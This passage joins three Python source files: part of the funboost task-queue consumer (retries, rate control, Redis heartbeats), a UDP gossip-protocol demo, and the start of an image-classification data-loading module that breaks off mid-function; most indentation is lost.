async def _async_run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times,
function_result_status: FunctionResultStatus, ):
"""虽然和上面有点大面积重复相似,这个是为了asyncio模式的,asyncio模式真的和普通同步模式的代码思维和形式区别太大,
框架实现兼容async的消费函数很麻烦复杂,连并发池都要单独写"""
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
function_result_status.run_times = current_retry_times + 1
# noinspection PyBroadException
t_start = time.time()
try:
corotinue_obj = self.consuming_function(**function_only_params)
if not asyncio.iscoroutine(corotinue_obj):
                self.logger.critical(f'The concurrency mode is set to async, but the consuming function is not an async coroutine function; '
                                     f'do not set concurrent_mode of the consuming function {self.consuming_function.__name__} to 4')
# noinspection PyProtectedMember,PyUnresolvedReferences
os._exit(444)
if self._function_timeout == 0:
rs = await corotinue_obj
# rs = await asyncio.wait_for(corotinue_obj, timeout=4)
else:
rs = await asyncio.wait_for(corotinue_obj, timeout=self._function_timeout)
function_result_status.result = rs
function_result_status.success = True
if self._log_level <= logging.DEBUG:
                result_str_to_be_print = str(rs)[:100] if len(str(rs)) < 100 else str(rs)[:100] + ' ..... '
                self.logger.debug(f'Function {self.consuming_function.__name__} '
                                  f'run #{current_retry_times + 1} succeeded; it took {round(time.time() - t_start, 4)} seconds, '
                                  f'the arguments were [ {function_only_params} ] and the result was {result_str_to_be_print} . {corotinue_obj} ')
except Exception as e:
if isinstance(e, (PyMongoError,
                              ExceptionForRequeue)):  # Mongo is often unreachable or down during maintenance/backups, or the user deliberately raises an ExceptionForRequeue; in both cases the message is requeued and the configured retry count does not apply.
                self.logger.critical(f'Error {type(e)} {e} occurred in function [{self.consuming_function.__name__}]; the message is being requeued')
                # time.sleep(1)  # Avoid a rapid, endless error/requeue/dequeue loop that keeps the cpu and the broker busy.
await asyncio.sleep(1)
# return self._requeue(kw)
await simple_run_in_executor(self._requeue, kw)
function_result_status.has_requeue = True
return function_result_status
            self.logger.error(f'Function {self.consuming_function.__name__} raised an error on run #{current_retry_times + 1}; '
                              f'it took {round(time.time() - t_start, 4)} seconds,\n the arguments were {function_only_params} \n and the cause was {type(e)} {e} ',
exc_info=self._get_priority_conf(kw, 'is_print_detail_exception'))
function_result_status.exception = f'{e.__class__.__name__} {str(e)}'
return function_result_status
@abc.abstractmethod
def _confirm_consume(self, kw):
"""确认消费"""
raise NotImplementedError
def check_heartbeat_and_message_count(self):
self._msg_num_in_broker = self.publisher_of_same_queue.get_message_count()
if time.time() - self._last_timestamp_print_msg_num > 60:
if self._msg_num_in_broker != -1:
                self.logger.info(f'Queue [{self._queue_name}] still has [{self._msg_num_in_broker}] tasks')
self._last_timestamp_print_msg_num = time.time()
if self._msg_num_in_broker != 0:
self._last_timestamp_when_has_task_in_queue = time.time()
return self._msg_num_in_broker
@abc.abstractmethod
def _requeue(self, kw):
"""重新入队"""
raise NotImplementedError
def _apscheduler_job_miss(self, event):
"""
        This is an event hook of the apscheduler package.
ev.function_args = job.args
ev.function_kwargs = job.kwargs
ev.function = job.func
:return:
"""
# print(event.scheduled_run_time)
misfire_grace_time = self._get_priority_conf(event.function_kwargs["kw"], 'misfire_grace_time')
        self.logger.critical(f'The time now is {time_util.DatetimeConverter().datetime_str}, '
                             f'which exceeds the scheduled run time {event.scheduled_run_time} of this task by more than the configured {misfire_grace_time} seconds; giving up on this task \n'
                             f'{event.function_kwargs["kw"]["body"]} ')
self._confirm_consume(event.function_kwargs["kw"])
'''
        if self._get_priority_conf(event.function_kwargs["kw"], 'execute_delay_task_even_if_when_task_is_expired') is False:
            self.logger.critical(f'The time now is {time_util.DatetimeConverter().datetime_str}; the delayed run time configured for this task has expired \n'
                                 f'{event.function_kwargs["kw"]["body"]} , giving up on this task')
            self._confirm_consume(event.function_kwargs["kw"])
        else:
            self.logger.warning(f'The time now is {time_util.DatetimeConverter().datetime_str}; the delayed run time configured for this task has expired \n'
                                f'{event.function_kwargs["kw"]["body"]} ,'
                                f'but to guard against the delay having been caused by a task backlog, the framework still runs it once')
event.function(*event.function_args, **event.function_kwargs)
'''
def pause_consume(self):
"""设置队列为暂停消费状态"""
RedisMixin().redis_db_frame.set(self._redis_key_pause_flag, 1)
def continue_consume(self):
"""设置队列为继续消费状态"""
RedisMixin().redis_db_frame.set(self._redis_key_pause_flag, 0)
def _submit_task(self, kw):
        while 1:  # This block of code supports pausing consumption.
# print(self._pause_flag)
if self._pause_flag == 1:
time.sleep(1)
if time.time() - self._last_show_pause_log_time > 60:
                    self.logger.warning(f'Consumption of tasks in queue {self.queue_name} has been set to paused')
self._last_show_pause_log_time = time.time()
else:
break
if self._judge_is_daylight():
self._requeue(kw)
time.sleep(self.time_interval_for_check_do_not_run_time)
return
function_only_params = _delete_keys_and_return_new_dict(kw['body'], )
if self._get_priority_conf(kw, 'do_task_filtering') and self._redis_filter.check_value_exists(
                function_only_params):  # Check the function arguments and filter out tasks that have already been executed successfully.
            self.logger.warning(f'Task {kw["body"]} filtered out by the redis key [{self._redis_filter_key_name}]')
self._confirm_consume(kw)
return
publish_time = _get_publish_time(kw['body'])
msg_expire_senconds_priority = self._get_priority_conf(kw, 'msg_expire_senconds')
if msg_expire_senconds_priority and time.time() - msg_expire_senconds_priority > publish_time:
self.logger.warning(
                f'The message publish timestamp is {publish_time} {kw["body"].get("publish_time_format", "")}, which is {round(time.time() - publish_time, 4)} seconds ago, '
                f'exceeding the configured {msg_expire_senconds_priority} seconds; discarding the task')
self._confirm_consume(kw)
return 0
msg_eta = self._get_priority_conf(kw, 'eta')
msg_countdown = self._get_priority_conf(kw, 'countdown')
misfire_grace_time = self._get_priority_conf(kw, 'misfire_grace_time')
run_date = None
# print(kw)
if msg_countdown:
run_date = time_util.DatetimeConverter(kw['body']['extra']['publish_time']).datetime_obj + datetime.timedelta(seconds=msg_countdown)
if msg_eta:
run_date = time_util.DatetimeConverter(msg_eta).datetime_obj
# print(run_date,time_util.DatetimeConverter().datetime_obj)
# print(run_date.timestamp(),time_util.DatetimeConverter().datetime_obj.timestamp())
# print(self.concurrent_pool)
if run_date:
# print(repr(run_date),repr(datetime.datetime.now(tz=pytz.timezone(frame_config.TIMEZONE))))
self._delay_task_scheduler.add_job(self.concurrent_pool.submit, 'date', run_date=run_date, args=(self._run,), kwargs={'kw': kw},
misfire_grace_time=misfire_grace_time)
else:
self.concurrent_pool.submit(self._run, kw)
        if self._is_using_distributed_frequency_control:  # If distributed rate control is needed.
active_num = self._distributed_consumer_statistics.active_consumer_num
self._frequency_control(self._qps / active_num, self._msg_schedule_time_intercal * active_num)
else:
self._frequency_control(self._qps, self._msg_schedule_time_intercal)
def _frequency_control(self, qpsx, msg_schedule_time_intercalx):
        # The qps control code for the consuming function follows. Both single-consumer and distributed rate control are based on
        # direct computation, without relying on a redis incr counter, which keeps rate control cheap.
        if qpsx == 0:  # No rate control needed, so no sleeping needed.
return
if qpsx <= 5:
""" 原来的简单版 """
time.sleep(msg_schedule_time_intercalx)
elif 5 < qpsx <= 20:
""" 改进的控频版,防止消息队列中间件网络波动,例如1000qps使用redis,不能每次间隔1毫秒取下一条消息,
如果取某条消息有消息超过了1毫秒,后面不能匀速间隔1毫秒获取,time.sleep不能休眠一个负数来让时光倒流"""
time_sleep_for_qps_control = max((msg_schedule_time_intercalx - (time.time() - self._last_submit_task_timestamp)) * 0.99, 10 ** -3)
# print(time.time() - self._last_submit_task_timestamp)
# print(time_sleep_for_qps_control)
time.sleep(time_sleep_for_qps_control)
self._last_submit_task_timestamp = time.time()
else:
"""基于当前消费者计数的控频,qps很大时候需要使用这种"""
if time.time() - self._last_start_count_qps_timestamp > 1:
self._has_execute_times_in_recent_second = 1
self._last_start_count_qps_timestamp = time.time()
else:
self._has_execute_times_in_recent_second += 1
# print(self._has_execute_times_in_recent_second)
if self._has_execute_times_in_recent_second >= qpsx:
time.sleep((1 - (time.time() - self._last_start_count_qps_timestamp)) * 1)
@decorators.FunctionResultCacher.cached_function_result_for_a_time(120)
def _judge_is_daylight(self):
if self._is_do_not_run_by_specify_time_effect and (
self._do_not_run_by_specify_time[0] < time_util.DatetimeConverter().time_str < self._do_not_run_by_specify_time[1]):
self.logger.warning(
                f'The time now is {time_util.DatetimeConverter()}, which falls inside the window {self._do_not_run_by_specify_time}; not running')
return True
def wait_for_possible_has_finish_all_tasks(self, minutes: int = 3):
"""
        Judge whether all tasks in the queue have been consumed.
        Because consumption is asynchronous, the queue may be consumed while messages are still being published, and a few trailing tasks may still be
        awaiting acknowledgement while the consumer has not truly finished. Sometimes one still needs to know whether everything is done, so this provides
        an imprecise judgement; understand the reasons and your scenario before relying on it.
        Normally, as with celery, consumers are permanent background tasks that loop forever executing work, but some users need a completion check.
        :param minutes: if the consumer has executed no task for this many consecutive minutes AND the broker reports no messages, consumption is judged
                        finished; to guard against long-running tasks, completion is effectively judged over roughly two such periods.
"""
if minutes <= 1:
            raise ValueError('For judging probable completion, the window must be set to at least 3 minutes, and 10 minutes is better')
no_task_time = 0
while 1:
# noinspection PyBroadException
message_count = self._msg_num_in_broker
# print(message_count,self._last_execute_task_time,time.time() - self._last_execute_task_time)
if message_count == 0 and self._last_execute_task_time != 0 and (time.time() - self._last_execute_task_time) > minutes * 60:
no_task_time += 30
else:
no_task_time = 0
time.sleep(30)
if no_task_time > minutes * 60:
break
def clear_filter_tasks(self):
RedisMixin().redis_db_frame.delete(self._redis_filter_key_name)
        self.logger.warning(f'Cleared the task filter stored under the key {self._redis_filter_key_name}')
def __str__(self):
        return f'consumer for queue {self.queue_name} with function {self.consuming_function}'
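# A minimal, illustrative subclass sketch (not part of funboost itself) of the template-method contract described in
# AbstractConsumer.__init__: a concrete consumer only supplies _shedual_task / _confirm_consume / _requeue, while
# concurrency, retries, rate control and persistence are inherited. The in-memory "broker" attribute used here is an
# assumption for demonstration; a runnable consumer also needs a BROKER_KIND with a matching publisher registered in the factory.
class _DemoInMemoryConsumer(AbstractConsumer):
    BROKER_KIND = None  # a real subclass would set one of the BrokerEnum values here
    _demo_broker = None  # e.g. a queue.Queue of JSON strings, injected by surrounding demo code

    def _shedual_task(self):
        # keep_circulating(1) wraps this method, so pulling a single message per call is enough.
        raw_message = self._demo_broker.get()
        self._print_message_get_from_broker('in_memory', raw_message)
        self._submit_task({'body': json.loads(raw_message)})

    def _confirm_consume(self, kw):
        # Nothing to acknowledge for an in-memory queue; a real broker would ack/delete the message here.
        pass

    def _requeue(self, kw):
        # Put the message back so that it is delivered again.
        self._demo_broker.put(json.dumps(kw['body']))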
# noinspection PyProtectedMember
class ConcurrentModeDispatcher(LoggerMixin):
def __init__(self, consumerx: AbstractConsumer):
self.consumer = consumerx
self._concurrent_mode = self.consumer._concurrent_mode
self.timeout_deco = None
if self._concurrent_mode in (ConcurrentModeEnum.THREADING, ConcurrentModeEnum.SINGLE_THREAD):
self.timeout_deco = decorators.timeout
elif self._concurrent_mode == ConcurrentModeEnum.GEVENT:
self.timeout_deco = gevent_timeout_deco
elif self._concurrent_mode == ConcurrentModeEnum.EVENTLET:
self.timeout_deco = evenlet_timeout_deco
        self.logger.warning(f'{self.consumer} concurrency mode set '
                            f'to {ConsumersManager.get_concurrent_name_by_concurrent_mode(self._concurrent_mode)}')
def check_all_concurrent_mode(self):
if ConsumersManager.global_concurrent_mode is not None and self.consumer._concurrent_mode != ConsumersManager.global_concurrent_mode:
ConsumersManager.show_all_consumer_info()
# print({self.consumer._concurrent_mode, ConsumersManager.global_concurrent_mode})
if not {self.consumer._concurrent_mode, ConsumersManager.global_concurrent_mode}.issubset({ConcurrentModeEnum.THREADING,
ConcurrentModeEnum.ASYNC,
ConcurrentModeEnum.SINGLE_THREAD}):
                # The threading, asyncio and single_thread modes can coexist, but within one interpreter gevent cannot be combined with other concurrency modes, and neither can eventlet.
                raise ValueError('''Because of monkey patching, two concurrency types cannot be set inside the same interpreter. Please review the displayed
                information of all consumers, search for the concurrent_mode keyword, and make sure all consumers in the current interpreter use only one
                concurrency mode (or compatible ones): asyncio, threading and single_thread can coexist, but gevent cannot coexist with threading,
                and gevent cannot coexist with eventlet''')
ConsumersManager.global_concurrent_mode = self.consumer._concurrent_mode
def build_pool(self):
if self.consumer._concurrent_pool is not None:
return self.consumer._concurrent_pool
        pool_type = None  # These are duck-typed classes modeled on ThreadPoolExecutor, with identical public method names and behaviour, so they can be swapped for one another.
if self._concurrent_mode == ConcurrentModeEnum.THREADING:
pool_type = CustomThreadPoolExecutor
# pool_type = BoundedThreadPoolExecutor
elif self._concurrent_mode == ConcurrentModeEnum.GEVENT:
pool_type = GeventPoolExecutor
elif self._concurrent_mode == ConcurrentModeEnum.EVENTLET:
pool_type = CustomEventletPoolExecutor
elif self._concurrent_mode == ConcurrentModeEnum.ASYNC:
pool_type = AsyncPoolExecutor
elif self._concurrent_mode == ConcurrentModeEnum.SINGLE_THREAD:
pool_type = SoloExecutor
# elif self._concurrent_mode == ConcurrentModeEnum.LINUX_FORK:
# pool_type = SimpleProcessPool
# pool_type = BoundedProcessPoolExecutor
# from concurrent.futures import ProcessPoolExecutor
# pool_type = ProcessPoolExecutor
if self._concurrent_mode == ConcurrentModeEnum.ASYNC:
self.consumer._concurrent_pool = self.consumer._specify_concurrent_pool if self.consumer._specify_concurrent_pool is not None else pool_type(
self.consumer._concurrent_num, loop=self.consumer._specify_async_loop)
else:
# print(pool_type)
self.consumer._concurrent_pool = self.consumer._specify_concurrent_pool if self.consumer._specify_concurrent_pool is not None else pool_type(
self.consumer._concurrent_num)
# print(self._concurrent_mode,self.consumer._concurrent_pool)
return self.consumer._concurrent_pool
def schedulal_task_with_no_block(self):
if ConsumersManager.schedual_task_always_use_thread:
t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
ConsumersManager.schedulal_thread_to_be_join.append(t)
t.start()
else:
if self._concurrent_mode in [ConcurrentModeEnum.THREADING, ConcurrentModeEnum.ASYNC,
ConcurrentModeEnum.SINGLE_THREAD, ]:
t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
ConsumersManager.schedulal_thread_to_be_join.append(t)
t.start()
elif self._concurrent_mode == ConcurrentModeEnum.GEVENT:
g = gevent.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
ConsumersManager.schedulal_thread_to_be_join.append(g)
            elif self._concurrent_mode == ConcurrentModeEnum.EVENTLET:
g = eventlet.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
ConsumersManager.schedulal_thread_to_be_join.append(g)
def wait_for_possible_has_finish_all_tasks_by_conusmer_list(consumer_list: typing.List[AbstractConsumer], minutes: int = 3):
"""
    Judge whether several consumers have all finished consuming.
    Because consumption is asynchronous, queues may be consumed while messages are still being published, and a few trailing tasks may still be awaiting
    acknowledgement while the consumers have not truly finished. This provides an imprecise completion check; understand the reasons and your scenario before relying on it.
    Normally, as with celery, consumers are permanent background tasks that loop forever executing work, but some users need a completion check.
    :param consumer_list: a list of consumers
    :param minutes: if a consumer has executed no task for this many consecutive minutes AND the broker reports no messages, consumption is judged finished;
                    to guard against long-running tasks, completion is effectively judged over roughly two such periods.
:return:
"""
with BoundedThreadPoolExecutor(len(consumer_list)) as pool:
for consumer in consumer_list:
            pool.submit(consumer.wait_for_possible_has_finish_all_tasks, minutes)  # Pass the callable and its argument; calling it here would block the loop and submit None to the pool.
class DistributedConsumerStatistics(RedisMixin, LoggerMixinDefaultWithFileHandler):
"""
    To stay compatible with brokers that merely emulate an mq (e.g. redis, which does not implement amqp and whose list structure is far from a real mq),
    this obtains how many actively connected consumers a queue has.
    Consumer statistics in a distributed environment. There are three main purposes:
    1. Count active consumers for distributed rate control.
       Once the number of consumers across the whole environment is known, it is used for distributed qps control; without it, rate control only applies to the current process.
       Even on a single machine, if xx.py is started 3 times with its consumer's qps set to 10, the function ends up running 30 times per second instead of 10 unless distributed rate control is used.
    2. Record the ids of all active consumers in the distributed environment; if a consumer id is missing, that consumer has gone offline or been shut down
       and its messages can be redelivered. Used for brokers without native server-side consume acknowledgement.
    3. Read the stop and pause flags from redis, so that consumption can be stopped or paused by commands sent from elsewhere.
"""
def __init__(self, consumer: AbstractConsumer):
# self._consumer_identification = consumer_identification
# self._consumer_identification_map = consumer_identification_map
# self._queue_name = queue_name
self._consumer_identification = consumer.consumer_identification
self._consumer_identification_map = consumer.consumer_identification_map
self._queue_name = consumer.queue_name
self._consumer = consumer
self._redis_key_name = f'funboost_hearbeat_queue__str:{self._queue_name}'
self.active_consumer_num = 1
self._last_show_consumer_num_timestamp = 0
self._queue__consumer_identification_map_key_name = f'funboost_hearbeat_queue__dict:{self._queue_name}'
self._server__consumer_identification_map_key_name = f'funboost_hearbeat_server__dict:{nb_log_config_default.computer_ip}'
def run(self):
self.send_heartbeat()
self._consumer.keep_circulating(10, block=False)(self.send_heartbeat)()
        # decorators.keep_circulating(5, block=False)(self._show_active_consumer_num)()  # Mainly to count distributed consumers quickly and frequently so the distributed qps rate adjusts fast.
def _send_heartbeat_with_dict_value(self, redis_key, ):
        # Sends the heartbeat of the current consumer process; the values are dicts, recording which processes are running per machine or per queue.
results = self.redis_db_frame.smembers(redis_key)
with self.redis_db_frame.pipeline() as p:
for result in results:
result_dict = json.loads(result)
if self.timestamp() - result_dict['hearbeat_timestamp'] > 15 \
or self._consumer_identification_map['consumer_uuid'] == result_dict['consumer_uuid']:
                    # This runs every 10 seconds, so anything not updated within 15 seconds must have gone offline. The consumer also removes its own previous entry first.
p.srem(redis_key, result)
self._consumer_identification_map['hearbeat_datetime_str'] = time_util.DatetimeConverter().datetime_str
self._consumer_identification_map['hearbeat_timestamp'] = self.timestamp()
value = json.dumps(self._consumer_identification_map, sort_keys=True)
p.sadd(redis_key, value)
p.execute()
def send_heartbeat(self):
# Heartbeat keyed by queue name; the value is a string, which makes it easy to use as another redis key name.
results = self.redis_db_frame.smembers(self._redis_key_name)
with self.redis_db_frame.pipeline() as p:
for result in results:
if self.timestamp() - float(result.decode().split('&&')[-1]) > 15 or \
self._consumer_identification == result.decode().split('&&')[0]:  # This runs every 10 seconds, so an entry not updated for 15 seconds must be offline. The consumer also removes its own previous entry first.
p.srem(self._redis_key_name, result)
p.sadd(self._redis_key_name, f'{self._consumer_identification}&&{self.timestamp()}')
p.execute()
self._send_heartbeat_with_dict_value(self._queue__consumer_identification_map_key_name)
self._send_heartbeat_with_dict_value(self._server__consumer_identification_map_key_name)
self._show_active_consumer_num()
self._get_stop_and_pause_flag_from_redis()
def _show_active_consumer_num(self):
self.active_consumer_num = self.redis_db_frame.scard(self._redis_key_name) or 1
if time.time() - self._last_show_consumer_num_timestamp > 600:
self.logger.info(f'Across the whole distributed environment, queue {self._queue_name} has {self.active_consumer_num} consumers in total')
self._last_show_consumer_num_timestamp = time.time()
def get_queue_heartbeat_ids(self, without_time: bool):
if without_time:
return [idx.decode().split('&&')[0] for idx in self.redis_db_frame.smembers(self._redis_key_name)]
else:
return [idx.decode() for idx in self.redis_db_frame.smembers(self._redis_key_name)]
# noinspection PyProtectedMember
def _get_stop_and_pause_flag_from_redis(self):
stop_flag = self.redis_db_frame.get(self._consumer._redis_key_stop_flag)
if stop_flag is not None and int(stop_flag) == 1:
self._consumer._stop_flag = 1
else:
self._consumer._stop_flag = 0
pause_flag = self.redis_db_frame.get(self._consumer._redis_key_pause_flag)
if pause_flag is not None and int(pause_flag) == 1:
self._consumer._pause_flag = 1
else:
self._consumer._pause_flag = 0
class ActiveCousumerProcessInfoGetter(RedisMixin, LoggerMixinDefaultWithFileHandler):
"""
Get information about consumer processes in the distributed environment.
To use the 4 methods here, the corresponding function's @boost decorator must set is_send_consumer_hearbeat_to_redis=True so an active heartbeat is sent to redis automatically; otherwise no consumer process info can be found for that function.
To use this consumer process statistics feature, redis must be installed and its connection configured in funboost_config.py, no matter which message queue middleware type is used.
"""
def _get_all_hearbeat_info_by_redis_key_name(self, redis_key):
results = self.redis_db_frame.smembers(redis_key)
# print(type(results))
# print(results)
# If every process on every machine has been shut down, no thread remains to perform the deletion, so the 15-second check must be applied here as well.
active_consumers_processor_info_list = []
for result in results:
result_dict = json.loads(result)
if self.timestamp() - result_dict['hearbeat_timestamp'] < 15:
active_consumers_processor_info_list.append(result_dict)
return active_consumers_processor_info_list
def get_all_hearbeat_info_by_queue_name(self, queue_name) -> typing.List[typing.Dict]:
"""
Query which consumer processes are active for a given queue name.
Example of the returned result:
[{
"code_filename": "/codes/funboost/test_frame/my/test_consume.py",
"computer_ip": "172.16.0.9",
"computer_name": "VM_0_9_centos",
"consumer_id": 140477437684048,
"consumer_uuid": "79473629-b417-4115-b516-4365b3cdf383",
"consuming_function": "f2",
"hearbeat_datetime_str": "2021-12-27 19:22:04",
"hearbeat_timestamp": 1640604124.4643965,
"process_id": 9665,
"queue_name": "test_queue72c",
"start_datetime_str": "2021-12-27 19:21:24",
"start_timestamp": 1640604084.0780013
}, ...............]
"""
redis_key = f'funboost_hearbeat_queue__dict:{queue_name}'
return self._get_all_hearbeat_info_by_redis_key_name(redis_key)
def get_all_hearbeat_info_by_ip(self, ip=None) -> typing.List[typing.Dict]:
"""
Query which consumer processes are active on a machine by ip. If ip is not passed, query which consumer processes the local machine is running with the funboost framework; pass an ip to query any machine's consumer process info.
The result format is the same as that of the get_all_hearbeat_info_by_queue_name method above.
"""
ip = ip or nb_log_config_default.computer_ip
redis_key = f'funboost_hearbeat_server__dict:{ip}'
return self._get_all_hearbeat_info_by_redis_key_name(redis_key)
def _get_all_hearbeat_info_partition_by_redis_key_prefix(self, redis_key_prefix):
keys = self.redis_db_frame.scan(0, f'{redis_key_prefix}*', 10000)[1]
infos_map = {}
for key in keys:
key = key.decode()
infos = self.redis_db_frame.smembers(key)
dict_key = key.replace(redis_key_prefix, '')
infos_map[dict_key] = []
for info_str in infos:
info_dict = json.loads(info_str)
if self.timestamp() - info_dict['hearbeat_timestamp'] < 15:
infos_map[dict_key].append(info_dict)
return infos_map
def get_all_hearbeat_info_partition_by_queue_name(self) -> typing.Dict[typing.AnyStr, typing.List[typing.Dict]]:
"""获取所有队列对应的活跃消费者进程信息,按队列名划分,不需要传入队列名,自动扫描redis键。请不要在 funboost_config.py 的redis 指定的db中放太多其他业务的缓存键值对"""
infos_map = self._get_all_hearbeat_info_partition_by_redis_key_prefix('funboost_hearbeat_queue__dict:')
self.logger.info(f'Active consumer process info for every queue, partitioned by queue name: {json.dumps(infos_map, indent=4)}')
return infos_map
def get_all_hearbeat_info_partition_by_ip(self) -> typing.Dict[typing.AnyStr, typing.List[typing.Dict]]:
"""获取所有机器ip对应的活跃消费者进程信息,按机器ip划分,不需要传入机器ip,自动扫描redis键。请不要在 funboost_config.py 的redis 指定的db中放太多其他业务的缓存键值对 """
infos_map = self._get_all_hearbeat_info_partition_by_redis_key_prefix('funboost_hearbeat_server__dict:')
self.logger.info(f'Active consumer process info for every machine ip, partitioned by ip: {json.dumps(infos_map, indent=4)}')
return infos_map
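# Illustrative usage sketch (not part of the original funboost code): querying which
# consumer processes are alive. The queue name below is just the example value that
# appears in the docstring above, and the no-argument constructor is assumed.
def _example_inspect_active_consumers():
    getter = ActiveCousumerProcessInfoGetter()
    info_for_queue = getter.get_all_hearbeat_info_by_queue_name('test_queue72c')
    info_per_ip = getter.get_all_hearbeat_info_partition_by_ip()
    return info_for_queue, info_per_ip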
|
gossip.py
|
import sys
import time
import socket
import threading
class Gossip:
infected_nodes = set()
def __init__(self, host:str, port:int, connected_nodes:set):
'''
Initializes the variables to be used and starts the threads.
Expects the host, the port, and the ports connected to it.
'''
self.hostname = host
self.port = port
self.connected_nodes = connected_nodes
self.susceptible_nodes = connected_nodes
# use SOCK_DGRAM so data can be sent without a connection (UDP)
self.node = socket.socket(type=socket.SOCK_DGRAM)
# bind the server address and port
self.node.bind((self.hostname, self.port))
print(f'Starting a node on port {self.port}')
print(f'Susceptible nodes => {self.susceptible_nodes if len(self.susceptible_nodes) != 0 else {}}\n')
# start the threads that type and receive messages
self.start_threads()
def input_message(self):
'''
Types the messages to be sent.
'''
while True:
# refresh the list of susceptible nodes
self.susceptible_nodes = self.connected_nodes.copy()
print('Type a message:')
message_to_send = input()
if message_to_send != 'exit':
self.transmit_message(message_to_send.encode('ascii'))
else:
self.node.close()
sys.exit()
def receive_message(self):
'''
Receives the messages.
'''
while True:
# refresh the list of susceptible nodes
self.susceptible_nodes = self.connected_nodes.copy()
# use 'recvfrom' to receive the messages
# we are using a connectionless protocol (UDP)
message_to_forward, address = self.node.recvfrom(1024)
self.susceptible_nodes.discard(address[1])
Gossip.infected_nodes.add(address[1])
time.sleep(2)
print(f'\nMessage: "{message_to_forward.decode("ascii")}"')
print(f'Received at {time.ctime(time.time())} on port [{address[1]}]\n')
self.transmit_message(message_to_forward)
def transmit_message(self, message: bytes):
'''
Sends the message to the remaining
susceptible nodes.
'''
while len(self.susceptible_nodes) != 0:
selected_port = self.susceptible_nodes.pop()
print('-' * 50)
print(f'Susceptible nodes => {self.susceptible_nodes if len(self.susceptible_nodes) != 0 else {}}')
print(f'Infected nodes => {Gossip.infected_nodes if len(Gossip.infected_nodes) != 0 else {}}')
print(f'Selected port => [{selected_port}]')
# use 'sendto' to transmit the messages
# we are using a connectionless protocol (UDP)
self.node.sendto(message, (self.hostname, selected_port))
self.susceptible_nodes.discard(selected_port)
Gossip.infected_nodes.add(selected_port)
print(f'Message: "{message.decode("ascii")}" sent to [{selected_port}]')
print(f'Susceptible nodes => {self.susceptible_nodes if len(self.susceptible_nodes) != 0 else {}}')
print(f'Infected nodes => {Gossip.infected_nodes if len(Gossip.infected_nodes) != 0 else {}}')
print('-' * 50)
time.sleep(2)
def start_threads(self):
'''
Lets each node type a message while
still being able to receive other messages.
'''
input_msg_thread = threading.Thread(target=self.input_message)
receive_msg_thread = threading.Thread(target=self.receive_message)
input_msg_thread.daemon = True
input_msg_thread.start()
receive_msg_thread.daemon = True
receive_msg_thread.start()
input_msg_thread.join()
receive_msg_thread.join()
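# Illustrative usage sketch (not part of the original script): each node would be
# started in its own terminal/process; the ports are arbitrary example values. Note
# that the constructor blocks, since it joins the input/receive threads.
def _example_start_node():
    Gossip('localhost', 5001, {5002, 5003})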
|
data_utils.py
|
"""
Miscellaneous functions manage data.
Date: September 2018
Author: Ignacio Heredia
Email: iheredia@ifca.unican.es
Github: ignacioheredia
"""
import os
import threading
from multiprocessing import Pool
import queue
import subprocess
import warnings
import base64
import numpy as np
import requests
from tqdm import tqdm
from tensorflow.keras.utils import to_categorical, Sequence
import cv2
import albumentations
from albumentations.augmentations import transforms
from albumentations.imgaug import transforms as imgaug_transforms
def load_data_splits(splits_dir, im_dir,use_location, split_name='train'):
"""
Load the data arrays from the [train/val/test].txt files.
Lines of txt files have the following format:
'relative_path_to_image' 'image_label_number' 'image_location_label_number'
Parameters
----------
im_dir : str
Absolute path to the image folder.
split_name : str
Name of the data split to load
use_location : bool
Whether to also load and return the location labels.
Returns
-------
X : Numpy array of strs
First column: Contains 'absolute_path_to_file' to images.
y : Numpy array of int32
Image label number
"""
if use_location :
print("con location")
#Usual workflow with extra stuff in order to return location labels properly
if '{}.txt'.format(split_name) not in os.listdir(splits_dir):
raise ValueError("Invalid value for the split_name parameter: there is no `{}.txt` file in the `{}` "
"directory.".format(split_name, splits_dir))
# Loading splits
print("Loading {} data...".format(split_name))
split = np.genfromtxt(os.path.join(splits_dir, '{}.txt'.format(split_name)), dtype='str', delimiter=' ')
X = np.array([os.path.join(im_dir, i) for i in split[:, 0]])
#TODO Check this part of the code
if len(split.shape) == 2:
y = split[:, 1].astype(np.int32)
location = split[:, 2].astype(np.int32)
else:  # the test file may not have labels
y = None
location = None
return X, y, location
else:
print("sin location")
#If no location data, the workflow resumes as usual
if '{}.txt'.format(split_name) not in os.listdir(splits_dir):
raise ValueError("Invalid value for the split_name parameter: there is no `{}.txt` file in the `{}` "
"directory.".format(split_name, splits_dir))
# Loading splits
print("Loading {} data...".format(split_name))
split = np.genfromtxt(os.path.join(splits_dir, '{}.txt'.format(split_name)), dtype='str', delimiter=' ')
X = np.array([os.path.join(im_dir, i) for i in split[:, 0]])
#TODO Check this part of the code
if len(split.shape) == 2:
y = split[:, 1].astype(np.int32)
else:  # the test file may not have labels
y = None
return X, y
def mount_nextcloud(frompath, topath):
"""
Mount a NextCloud folder on your local machine or vice versa.
"""
command = (['rclone', 'copy', frompath, topath])
result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = result.communicate()
if error:
warnings.warn("Error while mounting NextCloud: {}".format(error))
return output, error
def load_class_names(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading class names...")
class_names = np.genfromtxt(os.path.join(splits_dir, 'classes.txt'), dtype='str', delimiter='/n')
return class_names
def load_location_names(splits_dir):
"""
Load list of location names
Returns
-------
Numpy array of shape (N) containing strs with location names
"""
print("Loading location names...")
location_names = np.genfromtxt(os.path.join(splits_dir, 'locations.txt'), dtype='str', delimiter='/n')
return location_names
def load_class_info(splits_dir):
"""
Load the class info file
Returns
-------
Numpy array of shape (N) containing strs with class info
"""
print("Loading class info...")
class_info = np.genfromtxt(os.path.join(splits_dir, 'info.txt'), dtype='str', delimiter='/n')
return class_info
def load_image(filename, filemode='local'):
"""
Function to load a local image path (or an url) into a numpy array.
Parameters
----------
filename : str
Path or url to the image
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
Returns
-------
A numpy array
"""
if filemode == 'local':
image = cv2.imread(filename, cv2.IMREAD_COLOR)
if image is None:
raise ValueError('The local path does not exist or does not correspond to an image: \n {}'.format(filename))
elif filemode == 'url':
try:
if filename.startswith('data:image'): # base64 encoded string
data = base64.b64decode(filename.split(';base64,')[1])
else: # normal url
